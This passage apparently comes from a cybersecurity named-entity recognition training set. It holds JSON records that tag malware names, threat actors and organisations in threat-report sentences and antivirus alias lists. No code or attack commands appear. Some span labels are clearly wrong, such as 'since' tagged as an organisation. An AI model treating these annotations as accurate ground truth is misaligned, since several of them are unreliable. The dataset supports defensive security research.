"Prometei, a highly modular botnet with worm-like capabilities that primarily deploys the Monero cryptocurrency miner, has been continuously improved and updated since it was first seen in 2016, posing a persistent threat to organizations.", "spans": {"MALWARE: Prometei,": [[0, 9]], "MALWARE: botnet": [[27, 33]], "MALWARE: the Monero cryptocurrency miner,": [[85, 117]], "ORGANIZATION: organizations.": [[224, 238]]}, "info": {"id": "cyner2_train_002232", "source": "cyner2_train"}} 
{"text": "A backdoor targetting Linux also known as: Possible_BASHLITE.SMLBN1 Unix.Trojan.Mirai-5607483-0 Linux.Trojan.Gafgyt.A HEUR:Backdoor.Linux.Gafgyt.y Trojan.Unix.Gafgyt.eikqfj Backdoor.Linux.Gafgyt!c Linux.BackDoor.Fgt.44 Possible_BASHLITE.SMLBN1 Backdoor.Linux.hxx LINUX/Gafgyt.klnbe Trojan.Backdoor.Linux.Gafgyt.1 HEUR:Backdoor.Linux.Gafgyt.y backdoor.linux.gafgyt.y Trojan.Linux.Gafgyt ELF/Gafgyt.WN!tr.bdr Win32/Backdoor.3e0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002233", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Feedel.28672 Trojan.Feedel Troj.W32.Feedel!c Trojan.Feedel.f TR/RedCap.ocnbv Trojan/Win32.Feedel Trj/CI.A Win32.Trojan.Feedel.Ecjy Win32/Trojan.ada", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002234", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OscoleF.Trojan Trojan.AutoIT.Injector.AP Trojan/W32.Cossta.95232.B Trojan.Napolar.A1 Trojan.Cossta.Win32.8040 Win32.Trojan.Napolar.b Infostealer.Napolar Win32/Tnega.dYPTOW BKDR_NAPOLAR.SM0 Win32.Backdoor.Napolar.B Trojan.AutoIT.Injector.AP Trojan.Win32.Cossta.cqikyo Trojan.AutoIT.Injector.AP TrojWare.Win32.Kryptik.BLGK Trojan:W32/Napolar.A Trojan.Hottrend.355 BKDR_NAPOLAR.SM0 BehavesLike.Win32.Trojan.nh Trojan.Win32.Napolar TrojanDropper.Dapato.nxc TR/BAS.Zusy.2144567 Trojan/Win32.Cossta Trojan.AutoIT.Injector.AP Trojan:Win32/Napolar.A Trojan/Win32.Cossta.C211827 Trojan.AutoIT.Injector.AP TScope.Malware-Cryptor.SB Trojan.Napolar Trj/Napolar.A Win32/Napolar.A Trojan.Win32.Cossta.a W32/Cossta.A!tr Win32/Trojan.235", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002235", "source": "cyner2_train"}} {"text": "A longstanding cyberespionage campaign has been targeting mainly Japanese organizations with its own, custom-developed, malware Backdoor.Daserf.", "spans": {"THREAT_ACTOR: longstanding cyberespionage campaign": [[2, 38]], "ORGANIZATION: Japanese organizations": 
[[65, 87]], "MALWARE: malware": [[120, 127]]}, "info": {"id": "cyner2_train_002236", "source": "cyner2_train"}} {"text": "JPCERT/CC has been observing malicious shortcut files that are sent as email attachments to a limited range of organisations since around October 2015.", "spans": {"ORGANIZATION: JPCERT/CC": [[0, 9]], "MALWARE: malicious shortcut files": [[29, 53]], "ORGANIZATION: since": [[125, 130]]}, "info": {"id": "cyner2_train_002237", "source": "cyner2_train"}} {"text": "Devices infected by these malicious programs usually form a kind of advertising botnet via which advertising Trojans distribute each other as well as the advertised apps.", "spans": {"SYSTEM: Devices": [[0, 7]], "MALWARE: malicious programs": [[26, 44]]}, "info": {"id": "cyner2_train_002238", "source": "cyner2_train"}} {"text": "We have named this tool that generates these documents DealersChoice.", "spans": {"MALWARE: tool": [[19, 23]], "MALWARE: DealersChoice.": [[55, 69]]}, "info": {"id": "cyner2_train_002241", "source": "cyner2_train"}} {"text": "As it continues to evolve and develop, Proofpoint researchers have detected it distributing a new remote access Trojan RAT.", "spans": {"ORGANIZATION: Proofpoint researchers": [[39, 61]], "MALWARE: remote access Trojan RAT.": [[98, 123]]}, "info": {"id": "cyner2_train_002242", "source": "cyner2_train"}} {"text": "This blog dives into the specifics of the ransomware used by the gang, as well as some information regarding their victim naming and shaming website, filled with non-paying victims and stolen data.", "spans": {"MALWARE: ransomware": [[42, 52]], "THREAT_ACTOR: the gang,": [[61, 70]]}, "info": {"id": "cyner2_train_002244", "source": "cyner2_train"}} {"text": "Qakbot has been around for years, but it's nothing to be complacent about.", "spans": {"MALWARE: Qakbot": [[0, 6]]}, "info": {"id": "cyner2_train_002245", "source": "cyner2_train"}} {"text": "In 2019, Cl0p Ransomware surfaced as a Ransomware-as-a-Service RaaS model and became 
notorious due to its advanced techniques.", "spans": {"MALWARE: Cl0p Ransomware": [[9, 24]], "MALWARE: Ransomware-as-a-Service RaaS model": [[39, 73]]}, "info": {"id": "cyner2_train_002247", "source": "cyner2_train"}} {"text": "These indicator include the use of the same infrastructure for the attacks, similar Tactics, Techniques and Procedures TTPs, the targeting of demographically similar victims and operating geographically within the Indian Subcontinent", "spans": {"SYSTEM: infrastructure": [[44, 58]]}, "info": {"id": "cyner2_train_002249", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.VAsidBackup.Worm Worm.Win32.AutoRun!O Worm.Hupigon Win32.Trojan.WisdomEyes.16070401.9500.9977 Worm.Win32.AutoRun.hht Backdoor.W32.IRCBot.lebE Trojan.Packed.650 Trojan.Sasfis.Win32.3750 Backdoor.Win32.Hupigon Worm/AutoRun.kwf Worm/Win32.AutoRun Win32.Virut.ce.57344 Worm.Win32.AutoRun.hht Worm:Win32/Hupigon.D HEUR/Fakon.mwf TScope.Malware-Cryptor.SB W32/Sohanat.JC Win32/AutoRun.Hupigon.L Win32.Worm.Autorun.Dxcn Worm.AutoRun!oW5oVN0v9nU W32/Packed.2D18!tr Win32/Trojan.ce1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002251", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.AutorunSubot.Worm HackTool.Hoylecann Win.Trojan.HackTool-55 HackTool:Win32/Hoylecann.B Trojan/Win32.HackTool.C178639 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002253", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mbro Ransom_Molock.R004C0DAU18 Ransom_Molock.R004C0DAU18 Trojan-Ransom.Win32.Mbro.bbjy Trojan.Win32.Wecod.eoemqo Trojan.Win32.Z.Wecod.2575498 Win32.Trojan.Mbro.Wnwf BackDoor.Bifrost.30406 Trojan.Magania.Win32.70995 PUA.DRMSoft Trojan.Inject.zdn TR/Ransom.Molock.dkaaw Trojan/Win32.Wecod Ransom:Win32/Molock.A!bit Trojan-Ransom.Win32.Mbro.bbjy Trojan/Win32.Mbro.C2386226 TScope.Trojan.Delf Trojan.PWS.Magania!koUXbeUVt9s", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_train_002254", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Maudi.41880 Trojan.Maudi.ahd Trojan/Maudi.ahd Trojan.Win32.Obfuscated.bbgart Celesign.A Trojan.Win32.Maudi.ahi Trojan.Win32.A.Maudi.41880 Trojan.Obfuscated.based.1 TR/Maudi.C Trojan/Maudi.f Trojan:Win32/Tusmed.A Trojan/Win32.Maudi Trojan.Maudi Trojan.Win32.Tusmed W32/Maudi.AHD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002255", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Barkiofork Trojan/Barkiofork.b Trojan.Zusy.D14CE BKDR_INJECT.SMA Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Barkiofork BKDR_INJECT.SMA BackDoor.WebDor.55 TR/Barkiofork.A.28 Trojan:Win32/Barkiofork.A Trojan/Win32.Dllbot.R92635", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002256", "source": "cyner2_train"}} {"text": "These malicious Excel files use a number of different lures, providing evidence of what attackers are using to entice victims into executing them.", "spans": {"THREAT_ACTOR: attackers": [[88, 97]]}, "info": {"id": "cyner2_train_002257", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Razy.D3DB80 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Ursu.exohow BehavesLike.Win32.Backdoor.jm TR/Dropper.MSIL.hfzet Trojan:MSIL/CeeInject.AE!bit Win-Trojan/MSILKrypt02.Exp Trj/GdSda.A Win32.Trojan.Inject.Auto Trojan.MSIL.Injector MSIL/Injector.QGP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002259", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod8eb.Trojan.3030 Trojan.Downloader.Clisser.B Trojan.Downloader.Clisser.B Downloader.Clisser.Win32.1 Trojan/Downloader.Clisser.b Win32.Trojan.WisdomEyes.151026.9950.9999 W32/Downldr2.BOY Heur.AdvML.C Win32/TrojanDownloader.Clisser.B Trojan-Downloader.Win32.Clisser.b Trojan.Downloader.Clisser.B Trojan.Win32.Clisser.ddmj Trojan.Win32.Downloader.54784.AO[h] 
Troj.Downloader.W32.Clisser.b!c Trojan.Downloader.Clisser.B TrojWare.Win32.TrojanDownloader.Clisser.B Trojan.Downloader.Clisser.B BehavesLike.Win32.AdwareTopMoxie.qh W32/Downloader.TUUE-5046 TrojanDownloader.Clisser.b TR/Dldr.Clisser.B.1 W32/Clisser.B!tr.dldr Trojan[Downloader]/Win32.Clisser Trojan.Downloader.Clisser.B Trojan/Win32.Clisser.N2115772 TrojanDownloader:Win32/Clisser.B Trojan.Downloader.Clisser.B TrojanDownloader.Clisser Win32.Trojan-downloader.Clisser.Sxeg Trojan.DL.Clisser!glWq8gdbz3E Trojan-Downloader.Win32.Clisser Trojan.Downloader.Clisser.B Downloader.Clisser.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002264", "source": "cyner2_train"}} {"text": "The Italian language email had a weird attachment: ordine_065.js it would be Order Form in English which appeared quite malicious to me.", "spans": {"MALWARE: malicious": [[120, 129]]}, "info": {"id": "cyner2_train_002265", "source": "cyner2_train"}} {"text": "The malware may download and execute other binaries.", "spans": {"MALWARE: malware": [[4, 11]]}, "info": {"id": "cyner2_train_002266", "source": "cyner2_train"}} {"text": "A backdoor also known as: NetTool.Tor Backdoor.Bot Tool.Tor.Win32.4 Win32.Trojan.WisdomEyes.16070401.9500.9989 Backdoor.Trojan not-a-virus:NetTool.Win32.Tor.f Trojan.Win32.MLW.dbcsxd Trojan.DownLoader8.56801 Sefnit.ag W32/Trojan.OTFO-7506 HackTool[NetTool]/Win32.Tor TrojanDropper:Win32/Sefnit.A not-a-virus:NetTool.Win32.Tor.f TrojanDropper.Sefnit Riskware.NetTool! 
Win32/Trojan.07c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002268", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Floxif.A W32.Pioneer.CZ1 Virus.W32.Pioneer!c PE_FLOXIF.E Win32.Virus.Floxif.a W32/Floxif.B W32.Fixflo.B!inf Win32.Floxif.F PE_FLOXIF.E Win32.Floxif.A Virus.Win32.Pioneer.cz Win32.Floxif.A Virus.Win32.Pioneer.bvrqhu Win32.Floxif.A Virus.Win32.Floxif.A Win32.FloodFix.7 Virus.Floxif.Win32.1 W32/Floxif.B Win32/Pioneer.l Virus/Win32.Pioneer.cz TrojanDropper:Win32/Floxif.A Virus.Win32.Pioneer.cz Win32.Floxif.A Virus.Pioneer.4129 W32/Floxif.A Win32.Floxif.A Win32/Floxif.H Virus.Win32.Pionner.tt W32/Pioneer.CZ!tr Virus.Win32.Pioneer.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002271", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Malware11 Trojan.Inject.Small.C Hacktool.Radinject Trojan.Inject.Small.C Trojan.Inject.Small.C Win32.Trojan.WisdomEyes.16070401.9500.9926 Trojan.Inject.Small.C W32.Cabanas.lmfo Trojan.Inject.Small.C W32/Trojan2.MAPI Trojan/Win32.Inject.R14211 Trojan.Inject.Small.C Trj/CI.A Trojan.Hijacker Win32/Trojan.913", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002276", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Morkus.73728 Trojan.Gambee.BB3 Trojan.Kazy.D13FF6 Trojan.Win32.Morkus.bcz Win32.Trojan.Morkus.Tayq TrojWare.Win32.TrojanClicker.VB.IDP Trojan.DownLoader5.64540 BehavesLike.Win32.Trojan.lt TR/VB.Click.idpmnua Win32.Troj.Undef.kcloud TrojanDownloader:Win32/Gambee.A Trojan.Win32.Morkus.bcz Trojan/Win32.OnlineGameHack.R30007 Win32/TrojanClicker.VB.NYI Trojan-Clicker.Win32.VB W32/VBClicker.NY!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002277", "source": "cyner2_train"}} {"text": "This ransomware is currently being spread by a social engineering exploit kit to trick the user in downloading a malicious executable.", "spans": {"MALWARE: 
ransomware": [[5, 15]], "MALWARE: social engineering exploit kit": [[47, 77]], "MALWARE: malicious executable.": [[113, 134]]}, "info": {"id": "cyner2_train_002280", "source": "cyner2_train"}} {"text": "The group's activities show that foreign and domestic espionage and influence on geopolitics are the group's main motives, and not financial gain.", "spans": {"THREAT_ACTOR: group's": [[4, 11], [101, 108]], "THREAT_ACTOR: foreign and domestic espionage": [[33, 63]], "ORGANIZATION: geopolitics": [[81, 92]]}, "info": {"id": "cyner2_train_002281", "source": "cyner2_train"}} {"text": "Recently Bedep has been observed as the payload dropped by the Anger EK in a series of malvertising campaigns.", "spans": {"MALWARE: Bedep": [[9, 14]], "MALWARE: payload dropped": [[40, 55]], "MALWARE: Anger EK": [[63, 71]], "THREAT_ACTOR: malvertising campaigns.": [[87, 110]]}, "info": {"id": "cyner2_train_002282", "source": "cyner2_train"}} {"text": "A backdoor also known as: Joke.Kokegift JOKE_GESCHENK.A W32/Trojan4.EDF Joke.Geschenk JOKE_GESCHENK.A Win.Joke.CokeGift-2 Riskware.Win32.Geschenk.bdflz Joke.Geschenk BehavesLike.Win32.FakeAlertSecurityTool.cc Trojan-Spy.Win32.Zbot W32/Trojan.OREK-1496 JOKE/CokeGift.1 Joke:Win32/Kokegift.A Joke.Geschenk Win32.Trojan.Geschenk.Wvkp Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002286", "source": "cyner2_train"}} {"text": "A recently disclosed data breach suffered by Mexican fast food restaurant Chipotle was carried out by hackers linked to a group known as FIN7 or Carbanak Group, CyberScoop has learned.", "spans": {"ORGANIZATION: Mexican fast food restaurant Chipotle": [[45, 82]], "THREAT_ACTOR: hackers": [[102, 109]], "THREAT_ACTOR: group": [[122, 127]], "THREAT_ACTOR: FIN7": [[137, 141]], "THREAT_ACTOR: Carbanak Group,": [[145, 160]], "ORGANIZATION: CyberScoop": [[161, 171]]}, "info": {"id": "cyner2_train_002287", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.IEPassVH.Trojan 
Tool.NetPass.Win32.6782 not-a-virus:PSWTool.Win32.NetPass.wkh Riskware.Win32.NetPass.sphcx Win32.PSWTool.NetPass.~BAAD Program.PwdFind.5 Packed.PePatch.uw Trojan[PSWTool]/Win32.NetPass Application.Heur.cmKfbOVNU5lO not-a-virus:PSWTool.Win32.NetPass.wkh Riskware.PSWTool! not-a-virus:PSWTool.Win32.NetPass", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002289", "source": "cyner2_train"}} {"text": "Recently we detected new samples and Infrastructure of ISMAgent, a trojan in use by Iranian Threat Group GreenBug.", "spans": {"MALWARE: samples": [[25, 32]], "SYSTEM: Infrastructure of ISMAgent,": [[37, 64]], "MALWARE: trojan": [[67, 73]], "THREAT_ACTOR: Iranian Threat Group GreenBug.": [[84, 114]]}, "info": {"id": "cyner2_train_002292", "source": "cyner2_train"}} {"text": "Searching its name or one of its aliases Bebloh or Shiotob reveals a good deal of press from that time period along with a few technical analyses in 2009 2012 and 2013", "spans": {"THREAT_ACTOR: Searching": [[0, 9]], "THREAT_ACTOR: Bebloh": [[41, 47]], "THREAT_ACTOR: Shiotob": [[51, 58]]}, "info": {"id": "cyner2_train_002293", "source": "cyner2_train"}} {"text": "This posting is a follow-up of my previous work on this subject in Pulling Back the Curtains on EncodedCommand PowerShell Attacks", "spans": {}, "info": {"id": "cyner2_train_002294", "source": "cyner2_train"}} {"text": "It also includes SSL certificate checking aka SSL pinning, allowing it to evade scenarios in which an SSL man-in-the-middle is present.", "spans": {}, "info": {"id": "cyner2_train_002295", "source": "cyner2_train"}} {"text": "ThreatLabZ has been keeping an eye on RIG and in this post we will cover an example of a full RIG infection cycle.", "spans": {"ORGANIZATION: ThreatLabZ": [[0, 10]], "MALWARE: RIG": [[38, 41]]}, "info": {"id": "cyner2_train_002296", "source": "cyner2_train"}} {"text": "The Check Point research team identified a new mobile malware targeting millions of Android users.", "spans": 
{"ORGANIZATION: Check Point research team": [[4, 29]], "MALWARE: new mobile malware": [[43, 61]], "ORGANIZATION: Android users.": [[84, 98]]}, "info": {"id": "cyner2_train_002297", "source": "cyner2_train"}} {"text": "The target is CERT in the military domain.", "spans": {"ORGANIZATION: CERT": [[14, 18]], "ORGANIZATION: the military domain.": [[22, 42]]}, "info": {"id": "cyner2_train_002298", "source": "cyner2_train"}} {"text": "We have found evidence that the actors use a combination of legitimate tools and batch scripts to deploy the Disttrack payload to hostnames known to the attackers to exist in the targeted network.", "spans": {"THREAT_ACTOR: the actors": [[28, 38]], "MALWARE: tools": [[71, 76]], "MALWARE: Disttrack payload": [[109, 126]], "THREAT_ACTOR: the attackers": [[149, 162]], "SYSTEM: the targeted network.": [[175, 196]]}, "info": {"id": "cyner2_train_002302", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.JSTL TrojanDownloader.Mabjet Trojan.Downloader.JSTL Backdoor.W32.PcClient.lpjJ Trojan/Downloader.FlyStudio.az Trojan.Downloader.JSTL Win.Trojan.Flystudio-2191 Trojan.Downloader.JSTL Trojan.Downloader.JSTL Trojan.Win32.FlyStudio.cxpswl Trojan.Downloader.JSTL Adware.Downware.4022 Downloader.FlyStudio.Win32.2885 Trojan-Downloader.Flystudio TR/Dldr.FlyStudio.AZ Win32.Trojan.Fakeapp.Dvfy Win32/Trojan.51f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002306", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Emotet.CD Trojan/W32.Dovs.159744.B Win32.Malware!Drop Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.KZPI-4363 Trojan.Emotet TSPY_EMOTET.THAOIAL Win.Trojan.Emotet-6421984-0 Trojan.Win32.Dovs.frh Trojan.Emotet.CD Trojan.Win32.Dovs.exinig Win32.Trojan.Dovs.Wwnx Trojan.Emotet.CD Trojan.Emotet.CD TSPY_EMOTET.THAOIAL BehavesLike.Win32.Upatre.ch Trojan.Dovs.bke TR/Crypt.ZPACK.blsak W32/Kryptik.GBTT!tr Trojan.Emotet.CD Trojan.Win32.Z.Emotet.159744.B Trojan.Win32.Dovs.frh 
Trojan/Win32.Dovs.C2353482 Trojan.Emotet.CD Win32.Malware!Drop Trojan.Emotet Win32/Emotet.AZ Trojan-Banker.Emotet PE.Heur.InvalidSig Win32.Trojan-Spy.Emotet.KA Trj/RnkBend.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002307", "source": "cyner2_train"}} {"text": "While we monitor phishing campaigns used to distribute threats such as Dridex, Upatre, and Cryptowall, targeted phishing attacks are more convincing because the format of the message is personalized to the targeted user.", "spans": {"THREAT_ACTOR: phishing campaigns": [[17, 35]], "MALWARE: threats": [[55, 62]], "MALWARE: Dridex, Upatre,": [[71, 86]], "MALWARE: Cryptowall,": [[91, 102]], "THREAT_ACTOR: phishing attacks": [[112, 128]], "ORGANIZATION: targeted user.": [[206, 220]]}, "info": {"id": "cyner2_train_002308", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.AB1B MemScan:Trojan.Spy.Togfer.S Trojan-Dropper/W32.Small.45568.F TrojanDropper.Small Dropper.Small.Win32.1780 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Wingua.B Backdoor.Trojan MemScan:Trojan.Spy.Togfer.S Trojan-Dropper.Win32.Small.ep MemScan:Trojan.Spy.Togfer.S Trojan.Win32.Small.unzq Trojan.Win32.Z.Small.45568.Z Troj.Dropper.W32.Small.ep!c MemScan:Trojan.Spy.Togfer.S TrojWare.Win32.TrojanDropper.Small.EP MemScan:Trojan.Spy.Togfer.S Trojan.MulDrop.752 TROJ_SMALL.EP BehavesLike.Win32.Sdbot.pc Trojan/Dropper.Small.ep Worm.Win32.Randex.a W32/Wingua.TBPD-6936 Packed.Morphine.a DR/Small.EP.1 Trojan[Dropper]/Win32.Small Trojan.Spy.Togfer.S Trojan-Dropper.Win32.Small.ep MemScan:Trojan.Spy.Togfer.S TrojanSpy.Tofger Trj/Small.A Win32/TrojanDropper.Small.EP Win32.Trojan-dropper.Small.Amvx Trojan.DR.Small!QLjE4qGURJY W32/Small.EP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002309", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Delf.Win32.49957 Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Adclicker Trojan-Spy.Win32.Delf.tr 
TrojWare.Win32.PSW.QQPass.~HYJ Trojan.DownLoader.origin BehavesLike.Win32.Dropper.lc Trojan-Dropper.Delf Trojan[Spy]/Win32.Delf Trojan-Spy.Win32.Delf.tr Trojan/Win32.OnlineGameHack.R233 Trojan.PWS.Ceekat!HLFjv+sb6fY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002311", "source": "cyner2_train"}} {"text": "Researchers with Tencent Security recently disclosed details about Swearing Trojan, a mobile banking malware that attacked users in China.", "spans": {"ORGANIZATION: Researchers": [[0, 11]], "ORGANIZATION: Tencent Security": [[17, 33]], "MALWARE: Swearing Trojan,": [[67, 83]], "MALWARE: mobile banking malware": [[86, 108]], "ORGANIZATION: users": [[123, 128]]}, "info": {"id": "cyner2_train_002312", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Dolan.fam Backdoor/W32.Dolan.20480.D Backdoor.Dolan.fam Backdoor.Aoldoor Dolan.AA BKDR_AOLDOOR.A Backdoor.Win32.Dolan Backdoor.Dolan.G Backdoor.Win32.A.Dolan.20480[h] PE:Backdoor.Dolan.b!1173745952 Backdoor.Dolan.fam Backdoor.Win32.Dolan Backdoor.Dolan.fam BackDoor.Dolan Backdoor.Dolan.Win32.52 BKDR_AOLDOOR.A W32/Risk.PEXC-1723 BDS/Dolan.A.27 Trojan[Backdoor]/Win32.Dolan Backdoor.Dolan.fam Win-Trojan/Dolan.20480.D Backdoor.Dolan.fam Trojan.VBRA.01573 Backdoor.Win32.Dolan W32/Bdoor.ARY!tr.bdr BackDoor.Dolan.S Backdoor.Win32.Dolan.Alrb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002313", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PWS.AlLight.1.0.A Trojan-PWS/W32.AlLight.140800 PWS-LamLite.cfg Trojan.AlLight.Win32.34 Trojan/PSW.AlLight.10.a TROJ_LAMLITE.A TROJ_LAMLITE.A Trojan.PWS.AlLight.1.0.A Trojan-PSW.Win32.AlLight.10.a Trojan.PWS.AlLight.1.0.A Trojan.Win32.AlLight.dbgt Trojan.Win32.PSWAlLight.140800 Troj.PSW32.W.AlLight.10.a!c Trojan.PWS.AlLight.1.0.A TrojWare.Win32.PSW.AlLight.A Trojan.PWS.AlLight.1.0.A BackDoor.AntiLame.10 BehavesLike.Win32.Dropper.cc W32/Risk.CXII-8326 Backdoor/Antilam.10 
W32.Trojan.Phisher-LamLite TR/PSW.AlLight.10.A Trojan[PSW]/Win32.AlLight Trojan.PWS.AlLight.1.0.A Trojan-PSW.Win32.AlLight.10.a PWS:Win32/LammerLight.B Backdoor.RAT.AntiLamer TrojanPSW.AlLight Win32/PSW.AlLight.10.A Win32.Trojan-qqpass.Qqrob.Pjxn Trojan.PWS.AlLight!3dq9kq5oal8 Backdoor.Win32.Antilam W32/EQSteal.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002314", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.FlyStudio.Win32.14198 Trojan/FlyStudio.onh Win32/Oflwr.A!crypt Win32.Trojan.FlyStudio.F Riskware.Win32.ProcPatcher.djqzww Trojan.Win32.Z.Zusy.1400832.C Trojan.NtRootKit.18405 W32/Trojan.VHRL-9383 Variant.Zusy.hm RiskWare[RiskTool]/Win32.ProcPatcher.a Trojan.Zusy.D1CA4C TrojanDownloader:Win32/Nefhop.A Trj/CI.A Riskware.ProcPatcher! Win32/Trojan.Spy.6da", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002315", "source": "cyner2_train"}} {"text": "The Dyre financial Trojan has emerged over the past year to become one of the most potent financial fraud tools in operation.", "spans": {"MALWARE: Dyre financial Trojan": [[4, 25]], "MALWARE: financial fraud tools": [[90, 111]]}, "info": {"id": "cyner2_train_002316", "source": "cyner2_train"}} {"text": "For all registered domains we could identify NameCheap, Inc. 
as the registrar based in the United States.", "spans": {"ORGANIZATION: NameCheap, Inc.": [[45, 60]]}, "info": {"id": "cyner2_train_002317", "source": "cyner2_train"}} {"text": "The timestamp seems valid and close to the documented infection timeline.", "spans": {}, "info": {"id": "cyner2_train_002318", "source": "cyner2_train"}} {"text": "A backdoor also known as: TR/Dropper.MSIL.fdxny PWS:MSIL/Stimilina.R!bit Trojan/Win32.Bladabindi.R203992 Spyware.PasswordStealer Trojan.MSIL.Spy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002319", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9986 BackDoor.Msft.1 BehavesLike.Win32.SoftPulse.dc Virus.Win32.Virut Trojan.Zusy.D2EADF Worm:Win32/Chir.D@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002320", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PSW.Win32.Dybalom!O Trojan/Downloader.Small.almj W32/Downldr2.GCMU Win32/SillyPWS.T Win.Downloader.74007-1 Trojan-PSW.Win32.Dybalom.g Trojan.Win32.Small.vtda Trojan.Win32.Downloader.20992.MH TrojWare.Win32.TrojanDownloader.Small.~ZBL Trojan.DownLoad.41539 Downloader.Small.Win32.13741 W32/Downloader.UMUW-8666 TR/Dldr.Small.almk Trojan[PSW]/Win32.Dybalom Trojan-PSW.Win32.Dybalom.g PWS:Win32/Strpasseal.B Trojan/Win32.Downloader.R17920 TrojanPSW.Dybalom Win32.Trojan-qqpass.Qqrob.Pcsc Trojan.PWS.Strpasseal.P Trojan-Downloader.Win32.Small W32/Dybalom.SMA!tr Win32/Trojan.PSW.99c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002323", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.9AE7 Trojan.Regrun TROJ_DDOS.SMA Win.Trojan.VBDos-1 Trojan.Win32.Regrun.zft Trojan.Win32.Regrun.ewhpgb Trojan.DownLoader5.32190 TROJ_DDOS.SMA BehavesLike.Win32.Adware.dc Trojan.Regrun.aj Trojan/Win32.Regrun Trojan:Win32/Tocofob.A Trojan.Win32.Regrun.zft Trojan/Win32.Buzus.C23616 SScope.Trojan.VBRA.11870 Trojan.Heur.VP2.E3BBE8 
Trojan.Win32.VB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002325", "source": "cyner2_train"}} {"text": "As such, FastPOS's update does not come as a surprise—in time for the oncoming retail season to boot.", "spans": {"MALWARE: FastPOS's": [[9, 18]], "ORGANIZATION: retail": [[79, 85]]}, "info": {"id": "cyner2_train_002326", "source": "cyner2_train"}} {"text": "From what I can tell its still under development, this article will tell the story of this ransomware.", "spans": {}, "info": {"id": "cyner2_train_002329", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Bloodhound.Morphine BehavesLike.Win32.RAHack.qc Trojan.Win32.Hrup Packed.Morphine.a Backdoor:Win32/Wurdux.A.dll Trj/CI.A Packed/Morphine.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002330", "source": "cyner2_train"}} {"text": "The Postal Group is active since at least 2013 and was responsible for multiple different malware", "spans": {"ORGANIZATION: The Postal Group": [[0, 16]], "MALWARE: malware": [[90, 97]]}, "info": {"id": "cyner2_train_002331", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9995 W32/Trojan.OTQR-6881 Backdoor.Win32.Elirks.o Trojan.Win32.Elirks.evicnk Trojan.Win32.Z.Zbot.5650944 Trojan.DownLoader25.56963 Backdoor.Elirks.Win32.6 Trojan.Zbot.7 Backdoor.Win32.Elirks.o Trojan:Win32/Ralminey.A Backdoor.Elirks Win32/Trojan.BO.56e", "spans": {"MALWARE: backdoor": [[2, 10]]}, 